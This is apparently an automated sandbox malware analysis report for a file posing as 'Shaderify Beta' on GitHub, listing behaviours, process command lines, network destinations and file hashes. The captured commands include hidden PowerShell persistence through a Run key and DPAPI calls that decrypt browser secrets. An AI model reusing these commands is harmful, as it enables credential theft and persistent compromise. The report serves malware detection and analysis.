Analysis Overview
Threat Level: Likely malicious
The file https://github.com/crunexy/shaderify/blob/main/Shaderify%20Beta%208.4.4.exe was found to be: Likely malicious.
Malicious Activity Summary
Command and Scripting Interpreter: PowerShell
Downloads MZ/PE file
Loads dropped DLL
Reads user/profile data of web browsers
Executes dropped EXE
Checks computer location settings
Legitimate hosting services abused for malware hosting/C2
Looks up external IP address via web service
Adds Run key to start application
An obfuscated cmd.exe command-line is typically used to evade detection.
Enumerates physical storage devices
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of AdjustPrivilegeToken
NTFS ADS
Suspicious use of WriteProcessMemory
Suspicious use of SendNotifyMessage
Kills process with taskkill
Enumerates system info in registry
Enumerates processes with tasklist
Suspicious use of FindShellTrayWindow
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-06-03 09:37
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-06-03 09:37
Reported
2024-06-03 09:40
Platform
win10v2004-20240426-en
Max time kernel
125s
Max time network
130s
Command Line
Signatures
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Checks computer location settings
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\ShaderifyBeta.exe | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Downloads\Shaderify Beta 8.4.4.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\ShaderifyBeta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\ShaderifyBeta.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\ShaderifyBeta.exe | N/A |
Loads dropped DLL
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Powershell = "\"powershell.exe\" -WindowStyle Hidden -ExecutionPolicy Bypass -File \"C:\\Users\\Admin\\AppData\\Roaming\\aysGxbumtnpCIYJ.ps1\"" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ipapi.co | N/A | N/A |
| N/A | ipapi.co | N/A | N/A |
An obfuscated cmd.exe command-line is typically used to evade detection.
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\system32\cmd.exe | N/A |
Enumerates physical storage devices
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\taskkill.exe | N/A |
NTFS ADS
| Description | Indicator | Process | Target |
| File opened for modification | C:\Users\Admin\Downloads\Unconfirmed 744464.crdownload:SmartScreen | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeSecurityPrivilege | N/A | C:\Users\Admin\Downloads\Shaderify Beta 8.4.4.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://github.com/crunexy/shaderify/blob/main/Shaderify%20Beta%208.4.4.exe
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa1ec946f8,0x7ffa1ec94708,0x7ffa1ec94718
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2176 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2228 /prefetch:3
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2916 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3352 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3380 /prefetch:1
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5512 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3980 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5224 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5144 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5592 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=3464 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1788 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6084 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6336 /prefetch:8
C:\Users\Admin\Downloads\Shaderify Beta 8.4.4.exe
"C:\Users\Admin\Downloads\Shaderify Beta 8.4.4.exe"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,9279163350131985340,1299177392062764649,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6276 /prefetch:1
C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\ShaderifyBeta.exe
C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\ShaderifyBeta.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "tasklist"
C:\Windows\system32\tasklist.exe
tasklist
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\5dbqsjxw\5dbqsjxw.cmdline"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "taskkill /IM msedge.exe /F"
C:\Windows\system32\taskkill.exe
taskkill /IM msedge.exe /F
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES126A.tmp" "c:\Users\Admin\AppData\Local\Temp\5dbqsjxw\CSCAF1169F8BF2242AC91B3FE317EABC15.TMP"
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,79,140,170,28,159,76,186,66,142,38,182,119,163,26,99,64,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,185,159,240,208,13,156,200,108,45,135,44,176,129,143,6,115,14,150,227,249,148,119,234,116,224,96,29,33,212,104,170,96,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,193,95,10,239,172,143,134,225,162,41,152,60,176,145,157,35,118,85,217,123,128,194,204,191,246,204,30,108,18,131,213,178,48,0,0,0,127,128,168,71,40,89,247,46,1,166,118,221,191,145,234,30,1,173,118,77,148,5,64,204,5,235,188,34,174,228,186,249,225,87,140,219,90,44,25,69,248,236,74,84,159,90,146,253,64,0,0,0,255,43,126,128,18,187,23,87,25,160,186,243,225,123,94,103,184,180,189,79,200,113,208,201,114,58,128,110,14,174,4,115,249,90,142,62,150,176,21,218,23,28,117,251,7,185,115,7,217,115,159,146,236,149,160,78,38,8,75,41,190,8,222,156), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,79,140,170,28,159,76,186,66,142,38,182,119,163,26,99,64,0,0,0,0,2,0,0,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,185,159,240,208,13,156,200,108,45,135,44,176,129,143,6,115,14,150,227,249,148,119,234,116,224,96,29,33,212,104,170,96,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,193,95,10,239,172,143,134,225,162,41,152,60,176,145,157,35,118,85,217,123,128,194,204,191,246,204,30,108,18,131,213,178,48,0,0,0,127,128,168,71,40,89,247,46,1,166,118,221,191,145,234,30,1,173,118,77,148,5,64,204,5,235,188,34,174,228,186,249,225,87,140,219,90,44,25,69,248,236,74,84,159,90,146,253,64,0,0,0,255,43,126,128,18,187,23,87,25,160,186,243,225,123,94,103,184,180,189,79,200,113,208,201,114,58,128,110,14,174,4,115,249,90,142,62,150,176,21,218,23,28,117,251,7,185,115,7,217,115,159,146,236,149,160,78,38,8,75,41,190,8,222,156), $null, 'CurrentUser')
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,79,140,170,28,159,76,186,66,142,38,182,119,163,26,99,64,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,72,74,85,44,248,76,68,49,103,162,228,250,242,83,82,51,252,24,92,38,111,104,163,243,235,206,127,88,242,189,109,186,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,87,82,2,141,244,106,63,178,130,111,104,228,69,207,202,65,179,128,156,25,207,211,233,132,80,111,2,141,196,200,106,86,48,0,0,0,98,131,237,178,109,22,198,30,209,12,59,184,185,159,92,60,59,236,242,130,114,252,125,204,251,45,82,234,111,191,27,49,213,187,112,111,112,226,9,165,227,240,218,144,37,237,226,214,64,0,0,0,219,222,91,108,212,127,234,42,150,35,92,108,29,46,211,39,201,117,243,92,206,11,63,11,145,79,73,227,19,108,24,126,187,180,172,30,116,33,82,173,133,226,135,54,156,107,222,182,239,239,19,106,28,141,48,24,179,105,191,18,212,93,1,36), $null, 'CurrentUser')"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,79,140,170,28,159,76,186,66,142,38,182,119,163,26,99,64,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,72,74,85,44,248,76,68,49,103,162,228,250,242,83,82,51,252,24,92,38,111,104,163,243,235,206,127,88,242,189,109,186,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,87,82,2,141,244,106,63,178,130,111,104,228,69,207,202,65,179,128,156,25,207,211,233,132,80,111,2,141,196,200,106,86,48,0,0,0,98,131,237,178,109,22,198,30,209,12,59,184,185,159,92,60,59,236,242,130,114,252,125,204,251,45,82,234,111,191,27,49,213,187,112,111,112,226,9,165,227,240,218,144,37,237,226,214,64,0,0,0,219,222,91,108,212,127,234,42,150,35,92,108,29,46,211,39,201,117,243,92,206,11,63,11,145,79,73,227,19,108,24,126,187,180,172,30,116,33,82,173,133,226,135,54,156,107,222,182,239,239,19,106,28,141,48,24,179,105,191,18,212,93,1,36), $null, 'CurrentUser')
C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\ShaderifyBeta.exe
"C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\ShaderifyBeta.exe" --type=gpu-process --field-trial-handle=1872,10900538933876623952,4256326968210812408,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1896 /prefetch:2
C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\ShaderifyBeta.exe
"C:\Users\Admin\AppData\Local\Temp\2hKeMY7jlKB9NEevxDTBw3Vlp4o\ShaderifyBeta.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1872,10900538933876623952,4256326968210812408,131072 --enable-features=WebComponentsV0Enabled --disable-features=CookiesWithoutSameSiteMustBeSecure,SameSiteByDefaultCookies,SpareRendererForSitePerProcess --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=2208 /prefetch:8
C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | github.com | udp |
| GB | 20.26.156.215:443 | github.com | tcp |
| US | 8.8.8.8:53 | avatars.githubusercontent.com | udp |
| US | 8.8.8.8:53 | github.githubassets.com | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.108.133:443 | avatars.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | github-cloud.s3.amazonaws.com | udp |
| US | 8.8.8.8:53 | user-images.githubusercontent.com | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 215.156.26.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 154.111.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.108.199.185.in-addr.arpa | udp |
| US | 8.8.8.8:53 | collector.github.com | udp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| US | 140.82.113.21:443 | collector.github.com | tcp |
| US | 8.8.8.8:53 | 21.113.82.140.in-addr.arpa | udp |
| US | 8.8.8.8:53 | api.github.com | udp |
| US | 185.199.111.154:443 | github.githubassets.com | tcp |
| GB | 20.26.156.210:443 | api.github.com | tcp |
| US | 8.8.8.8:53 | 149.220.183.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 210.156.26.20.in-addr.arpa | udp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 8.8.8.8:53 | 196.249.167.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | raw.githubusercontent.com | udp |
| US | 185.199.108.133:443 | raw.githubusercontent.com | tcp |
| US | 8.8.8.8:53 | 103.169.127.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | shaderify.xyz | udp |
| US | 8.8.8.8:53 | ipapi.co | udp |
| US | 104.26.9.44:443 | ipapi.co | tcp |
| US | 104.21.62.38:443 | shaderify.xyz | tcp |
| US | 104.21.62.38:443 | shaderify.xyz | tcp |
| US | 104.21.62.38:443 | shaderify.xyz | tcp |
| US | 104.21.62.38:443 | shaderify.xyz | tcp |
| US | 104.21.62.38:443 | shaderify.xyz | tcp |
| US | 8.8.8.8:53 | 44.9.26.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 38.62.21.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 8b167567021ccb1a9fdf073fa9112ef0 |
| SHA1 | 3baf293fbfaa7c1e7cdacb5f2975737f4ef69898 |
| SHA256 | 26764cedf35f118b55f30b3a36e0693f9f38290a5b2b6b8b83a00e990ae18513 |
| SHA512 | 726098001ef1acf1dd154a658752fa27dea32bca8fbb66395c142cb666102e71632adbad1b7e2f717071cd3e3af3867471932a71707f2ae97b989f4be468ab54 |
\??\pipe\LOCAL\crashpad_4852_TNUTAIDSMBKCCJWM
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.dat
| MD5 | 537815e7cc5c694912ac0308147852e4 |
| SHA1 | 2ccdd9d9dc637db5462fe8119c0df261146c363c |
| SHA256 | b4b69d099507d88abdeff4835e06cc6711e1c47464c963d013cef0a278e52d4f |
| SHA512 | 63969a69af057235dbdecddc483ef5ce0058673179a3580c5aa12938c9501513cdb72dd703a06fa7d4fc08d074f17528283338c795334398497c771ecbd1350a |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 84c90da71ee6640fc379beb4a8f9e491 |
| SHA1 | 2058536acde71071b042d167e7abb3d9356bb801 |
| SHA256 | dc500dc4946201942d67a5e91f16ff5c8a08a911415002819e14ffb3ce5b41a8 |
| SHA512 | d56dbab3d76151ad7d9f3804cd2a2aec50e7d65c50e595303debf923eefe6f1c507e863b51f319d88828daa2894925fc8c6ae2c88a6b2ff06c5bba67e70eb486 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 46295cac801e5d4857d09837238a6394 |
| SHA1 | 44e0fa1b517dbf802b18faf0785eeea6ac51594b |
| SHA256 | 0f1bad70c7bd1e0a69562853ec529355462fcd0423263a3d39d6d0d70b780443 |
| SHA512 | 8969402593f927350e2ceb4b5bc2a277f3754697c1961e3d6237da322257fbab42909e1a742e22223447f3a4805f8d8ef525432a7c3515a549e984d3eff72b23 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\data_reduction_proxy_leveldb\CURRENT
| MD5 | 206702161f94c5cd39fadd03f4014d98 |
| SHA1 | bd8bfc144fb5326d21bd1531523d9fb50e1b600a |
| SHA256 | 1005a525006f148c86efcbfb36c6eac091b311532448010f70f7de9a68007167 |
| SHA512 | 0af09f26941b11991c750d1a2b525c39a8970900e98cba96fd1b55dbf93fee79e18b8aab258f48b4f7bda40d059629bc7770d84371235cdb1352a4f17f80e145 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Local State
| MD5 | 2720eb240c9ac8d245331bce525c8d8f |
| SHA1 | 702b2de1bac8d71452b5e26554611675022f43b4 |
| SHA256 | 51d01096034bfe3540c705f6c4f8335916301ed09da8cf928f1780e87e13081c |
| SHA512 | 4ac13602b981a9831bbc7fa78255015ab25dace7840294516b834624b4a5b6d54579d3ac52463118e6a498231dbe2a358cad188a6376187c1674e2e5e338b9b9 |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences
| MD5 | 45f6cac8b924fcd22271f385e4340e12 |
| SHA1 | de611e84d1a3a04bd5764689e66921148015729d |
| SHA256 | 64d4e92f419145d26ca8c85553b33e79fc4cadac5495091425e829ff8bdf2349 |
| SHA512 | 715e539f206b280b3e1b4cf8d90547f31a13f9cdbadb555303c5c51ccb5978e4dd14f4812331404f34f7f224ceb320d17f233f2a0dd06a7e311bf020993fefdf |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index
| MD5 | dc1047ff48837d1e4d98956e91ceecd3 |
| SHA1 | 2791986a126874f03d44f238cada061cde3d3301 |
| SHA256 | b727f3c52f66657160ca3baedc1416733e3e234956210474136e5902d9a5a42e |
| SHA512 | d1547232734272605fbce9016f52df30e9933d4b768b4af6e1eef6113b4173a5e0e3a87c897bc1f87b3eea62a9c26d978c7031a07b22eeecffb4c9d6d540429f |
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity~RFe578c52.TMP
| MD5 | 08c29a93c52a2c9d32186d5fbace80d2 |
| SHA1 | a62f92315d7c50552cfc4b0d46e30f0df40f6908 |
